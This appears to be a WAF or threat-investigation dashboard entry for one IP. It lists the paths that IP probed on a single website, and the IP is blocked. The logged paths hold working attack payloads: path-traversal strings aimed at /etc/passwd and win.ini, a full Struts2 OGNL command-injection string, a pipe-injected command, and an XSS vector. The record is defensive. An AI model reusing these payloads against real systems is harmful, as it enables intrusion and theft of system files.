Investigation Workspace

Entity: 134.122.136.96 (Ip)

Entity Details
Type
Ip
ASN
AS152194 - CTG Server Limited
Threat Intelligence
Multiple critical WAF deny rules triggered, including LFI, command injection, XSS, and bot impersonation, indicating severe malicious probing and exploit attempts. All accessed paths were flagged.
Linked Entities
TLS Fingerprints (1)
Hostnames Targeted
Hostname Request Count
www.darcherif.fr 179
Paths Targeted (with Hostname Counts)
Path Distinct Hostnames
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd 1
template/aui/text-inline.vm 1
content/crx/de/setPreferences.jsp;%0A.html 1
icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd 1
public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd 1
GallerySite/filesrc/fotoilan/388/middle/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd 1
api/Image/withpath/C:%5CWindows%5Cwin.ini 1
Content/Plugins/uploader/FileChoose.html 1
file/../../../../../../../../../../../../../../../../../../windows/win.ini 1
%24%7B%28%23_memberAccess%5B%27allowStaticMethodAccess%27%5D%3Dtrue%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28@java.lang.System@getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%23ros%3D%28@org.apache.struts2.ServletActionContext@getResponse%28%29.getOutputStream%28%29%29%29.%28@org.apache.commons.io.IOUtils@copy%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D/help.action 1
jeecg-boot/jmreport/queryFieldBySql 1
content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json 1
file-manager/backend/makefile 1
.well-known/pki-validation/ 1
etc/designs/xh1x.childrenlist.json/%3Csvg%20onload=alert%28document.domain%29%3E.html 1
cgit/cgit.cgi/git/objects/ 1
chat/imController/showOrDownByurl.do 1
api/v1/slack/image/slack-image%2F..%2F..%2F..%2Fetc%2Fpasswd 1
go/add-on/business-continuity/api/plugin 1
CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd 1
file/../../../../../../../../../../../../../../../../../../etc/passwd 1
7/0/33/1d/www.citysearch.com/search 1
wp-content/plugins/import-xml-feed/readme.txt 1
download/..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd 1
public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../windows/win.ini 1
./WEB-INF/classes/META-INF/microprofile-config.properties 1
server/node_upgrade_srv.js 1
modules/Rubrics/rubrics_visualise_saveAjax.php 1
.%2e/%2e%2e/%2e%2e/%2e%2e/etc/config/nodogsplash 1
..;/content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json 1
content/..;/crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css 1
cgi-bin/GetFileContent.cgi 1
crx/de/setPreferences.jsp;%0A.html 1
install 1
simpleeditor/common/commonReleaseNotes.do 1
cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd 1
assets/built%252F..%252F..%252F%25E0%25A4%25A/package.json 1
img/../../../../../../etc/passwd 1
api/2.0/mlflow/model-versions/create 1
chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd 1
nifi-api/access/config 1
cgi-bin/slogin/login.py 1
cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh 1
api/geojson 1
installer 1
setting.php 1
backup/auto.php 1
saml/login 1
../../etc/passwd 1
api/get-users 1
🚫

Block

Multiple critical WAF deny rules triggered, including LFI, command injection, XSS, and bot impersonation, indicating severe malicious probing and exploit attempts. All accessed paths were flagged.

2025-11-30 14:03:57